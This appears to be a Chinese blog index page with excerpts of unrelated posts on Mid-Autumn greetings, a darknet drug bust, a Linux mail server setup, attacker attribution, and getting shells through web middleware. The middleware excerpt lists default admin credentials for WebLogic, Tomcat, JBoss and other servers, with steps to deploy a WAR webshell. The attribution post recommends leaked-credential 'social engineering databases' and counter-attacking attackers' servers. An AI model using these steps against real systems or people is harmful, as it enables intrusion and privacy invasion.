十六、中秋时节,祝你的好运一帆风顺,事业顺理成章,工作顺心配合,生活一顺百顺,赚钱顺手牵羊,爱情得心应手,一切都对你顺顺利利! 十七、别拿月饼不当干粮,咬一口富贵吉祥;别拿月亮不当美景,赏一眼金玉满堂;别拿祝福不当友谊,读一读情谊绵长;中秋佳节到,祝您合家团圆,幸福万年长 十八、丰收这幸福做陷,聚集这快乐做皮,取这天上的月亮为模型,为你做这世界上最为圆满的月饼,希望你中秋佳节人月两团圆,中秋节快乐。 十九、水盼团圆汇聚成海,石盼团圆高耸成山,月盼团圆辉映人间。水说海枯心不变,石说山崩情依恋,月说寄情我承担,我说中秋盼团圆!预祝中秋快乐! 二十、一轮明月,两束清风,三棵桂树,四杯好酒,五盏灯笼,六柱弥香,七枚月饼,八人对月,九九归一,十分美满。祝你中秋国庆快乐! 二十一、涵虚云雾分,人向广寒奔。蟾宫折桂日,岂敢笑王孙。中秋共晴光,美景伴良辰。药经灵兔捣,玉液满金樽。举杯同祝愿,月圆永无痕。 ...
-
暗网不再隐蔽了?警方破获179个暗网毒枭,缉获650万元美金
之前写了比较多的暗网相关的教程、文章,相信暗网大家都比较熟悉了,就算没有逛过也多少有耳闻,一直以来就以隐蔽性强为特征被许多人中意,这其中不泛有信息买卖、贩毒、军火等各种犯罪分子,而最近国外进行了一次国际联合执法,从全球消灭了暗网毒贩179个,缴获了超过650万美元的现金和虚拟货币。 DisrupTor行动缴获的一部分,洛杉矶联合刑事阿片类药物暗网执法小组没收了约120磅的甲基苯丙胺,15磅的摇头丸和五支枪支。 这次行动抓捕事件大部分在美国121起,其次是德国42起、英国4起、奥地利3起、荷兰8起、和瑞典1起等地,此次活动被命名为DisrupTor行动(Operation DisrupTor),取自经常用于访问暗网的专用网络浏览器Tor,由德国警察以及美国执法机构和欧洲刑警组织(Europol)领导。 行动成功后,美国副检察长杰弗里·罗森在新闻发布会上表示,此次行动是美国针对暗网有史以来规模最大的一次行动。此次行动中指控包括一个名为“Pill Cosby”的组织,该组织据称在俄亥俄州分发了超过一百万的芬太尼药片,和一个据称购买了佐治亚州被谋杀夫妇数据的男子。司法部还表示,这次的指控中还有人涉嫌使用炸弹来谋杀其他竞争对手。 罗森说“暗网毒品市场正在以一个惊人的速度在普及,让毒贩可以在世界上任何地方都能在线做广告并接单,暗网为他们提供了无限的非法贸易渠道。” 在COVID-19大流行期间,与阿片类药物有关的过量死亡人数激增,调查人员表示,他们已经追踪了至少35个州和世界多个国家/地区的18,000多个上市销售给所谓的客户。这表示还在有人在暗网从事着毒品交易,以及暗网中的大量买家。 调查还在继续进行中,为了能查出这些暗网毒枭背后的人员组织。...
-
红蓝演练之攻击溯源手段
攻击溯源的技术手段,主要包括ip定位、ID定位与攻击者定位。 通过ip可定位攻击者所在位置,以及通过ip反查域名等手段,查询域名的注册信息,域名注册人及邮箱等信息。 通过ID定位可获取攻击者常用的网络ID,查询攻击者使用同类ID注册过的微博或者博客、论坛等网站,通过对网络ID注册以及使用情况的查询,定位攻击者所在公司、手机号、邮箱、QQ等信息。 或通过其他手段定位攻击者,如反制攻击者vps,获取攻击者vps中的敏感信息、反钓鱼、恶意程序分析溯源等手段。 一、ip定位技术 通过安全设备或其他技术手段抓取攻击者的IP,对IP进行定位,查询此IP为IDC的IP、CDN的IP还是普通运营商的出口IP,通过IP反查可能会查询到攻击者使用的web域名、注册人、邮箱等信息。一般常用的IP查询工具有: 高精度IP定位:https://www.opengps.cn/Data/IP/LocHighAcc.aspx rtbasia(IP查询):https://ip.rtbasia.com/ ipplus360(IP查询):http://www.ipplus360.com/ip/ IP信息查询:https://www.ipip.net/ip.html/ IP地址查询在线工具:https://tool.lu/ip/ 当发现某些IP的攻击后,可以尝试通过此IP去溯源攻击者,具体实现过程如下: 首先通过ipip.net网站或者其他接口,查询此IP为IDC的IP、CDN的IP还是普通运营商的出口IP。 如果IP反查到域名就可以去站长之家或者whois.domaintools.com等网站去查询域名的注册信息。 通过收集到的这些信息,就比较容易定位到人。 在通过IP定位技术溯源过程,应注意以下情况: 假如IP反查到的域名过多,考虑就是CDN了,就没必要继续去查了。 假如是普通运营商的出口IP只能使用一些高精度IP定位工具粗略估计攻击者的地址,如果需要具体定位到人,则需要更多的信息。 二、ID追踪技术 在通过IP定位后技术追踪攻击者,可通过指纹库、社工库等或其他技术手段抓取到攻击者的微博账号、百度ID等信息,一般通过以下技术手段实现: 进行QQ等同名方式去搜索、进行论坛等同名方式搜索、社工库匹配等。 如ID是邮箱,则通过社工库匹配密码、以往注册信息等。 如ID是手机号,则通过手机号搜索相关注册信息,以及手机号使用者姓名等。 例如,当通过ID追踪技术手段定位到某攻击者的QQ号、QQ网名等信息,通过专业社工库可以进一步追踪攻击者使用的QQ号注册过的其它网络ID,从而获取更多攻击者信息,从而确定攻击者的真实身份。 三、攻击程序分析 攻击者如果在攻击过程中对攻击目标上传攻击程序(如钓鱼软件),可通过对攻击者上传的恶意程序进行分析,并结合IP定位、ID追踪等技术手段对攻击进行分析溯源,常用的恶意程序分析网站有: Ø 微步在线云沙箱:https://s.threatbook.cn/ Ø Virustotal:https://www.virustotal.com/gui/home/upload Ø 火眼(https://fireeye.ijinshan.com) Ø Anubis(http://anubis.iseclab.org) Ø joe(http://www.joesecurity.org) 例如,当发现某攻击者利用263邮箱系统0DAY(xss漏洞)进行钓鱼攻击,通过以下方式可追踪攻击者身份: 1)对恶意程序分析 通过上传文件到https://s.threatbook.cn进行代码分析,可得到以下信息,攻击者在攻击过程使用了以下三个域名: wvwvw.aaaa.com 用来接收cookies baidu-jaaaa.com 用来存放js恶意代码,伪造图片 flashaaaa.cn 用来存放木马病毒 然后对域名进行反查 ...
-
基于Linux搭建邮箱服务
解析你的服务器 然后用MX记录解析你的域名 一、解析生效检查 nslookup -q=mx XXXXXX.com ping XXXXXX.com 二、Postfix、Dovecot 安装 $$yum -y install postfix dovecot 三、配置 Postfix postconf -e 'myhostname = server.yourdomain.com' postconf -e 'mydestination = localhost, localhost.localdomain' postconf -e 'myorigin = $mydomain' postconf -e 'mynetworks = 127.0.0.0/8' postconf -e 'inet_interfaces = all' postconf -e 'inet_protocols = all' postconf -e 'mydestination = $myhostname, localhost.$mydomain, localhost, $mydomain' postconf -e 'home_mailbox = Maildir/' postconf -e 'smtpd_sasl_type = dovecot' postconf -e 'smtpd_sasl_path = private/auth' postconf -e 'smtpd_sasl_auth_enable = yes' postconf -e 'broken_sasl_auth_clients = yes' postconf -e 'smtpd_sasl_authenticated_header = yes' postconf -e 'smtpd_recipient_restrictions = permit_mynetworks, permit_sasl_authenticated, reject_unauth_destination' postconf -e 'smtpd_use_tls = yes' postconf -e 'smtpd_tls_cert_file = /etc/pki/dovecot/certs/dovecot.pem' postconf -e 'smtpd_tls_key_file = /etc/pki/dovecot/private/dovecot.pem' 注意:记得将 yourdomain.com 替换为你自己的域名 配置 smtps 部分邮件客户端依赖于使用 465 端口提供加密连接,所以我们修改配置,允许 Postfix 使用 465 端口发送邮件。 smtps inet n - n - - smtpd -o smtpd_tls_wrappermode=yes (注意: -o 前要保留空格) 启动 Smtp服务 $$systemctl enable postfix.service systemctl start postfix.service 配置 Dovecot ssl_cert = </etc/pki/dovecot/certs/dovecot.pem ssl_key = </etc/pki/dovecot/private/dovecot.pem protocols = imap pop3 lmtp listen = * mail_location = Maildir:~/Maildir disable_plaintext_auth = no 修改 10-master.conf unix_listener /var/spool/postfix/private/auth { mode = 0666 } 启动 Dovecot $$systemctl enable dovecot.service systemctl start dovecot.service 添加用户 useradd test 修改密码 passwd test 切换用户 su test 发信测试 echo "Mail Content" | mail -s "Mail Subject" xxxx@xxx.com ...
-
常见web中间件拿shell
1.weblogic 后台页面:(http为7001,https为7002) Google关键字:WebLogic Server AdministrationConsole inurl:console 默认的用户名密码 1、用户名密码均为:weblogic 2、用户名密码均为:system 3、用户名密码均为:portaladmin 4、用户名密码均为:guest 上传地方: workshop> Deployments> Web应用程序> 部署新的 Web 应用程序模块… 上传war的webshell。 上传后目标模块->部署。 2.Tomcat 后台:http://172.16.102.35:8080/manager/html 默认用户名密码 tomcat tomcat 上传地方: Deploy之后即发布成功 shell地址:http://172.16.102.35:8080/magerx/test.jsp(其中magerx为war包的名字) 3.jboss 后台:http://172.16.102.35:9990 上传地方:Deployments>Manage Deployments>Add Content Enable后即可发布 shell地址: http://172.16.102.35:8080/magerx/test.jsp 4.JOnAS 后台:http://172.16.102.35:9000/jonasAdmin/ 默认用户名密码: jadmin jonas tomcat tomcat jonas jonas 上传地方:Deployment>Web Modules (WAR)>Upload Apply之后即可发布 shell地址:http://172.16.102.35:9000/magerx/test.jsp 5.WebSphere 后台地址:https://172.16.102.35:9043/ibm/console/logon.jsp 上传地方:应用程序>新建应用程序>新建企业应用程序 接下来各种下一步,步骤4注意填好“上下文根” 完成后单击保存 回到应用程序>应用程序类型>WebSphere 企业应用程序 选中你上传的war包 这里是paxmac 点击启动 即可发布 shell地址:http://172.16.102.35:9080/paxmac/test.jsp <!– jsp文件打包,可以使用jdk/JRE自带的jar命令: 切换到要打包的文件目录 jar -cvf magerx.war test.jsp –> ...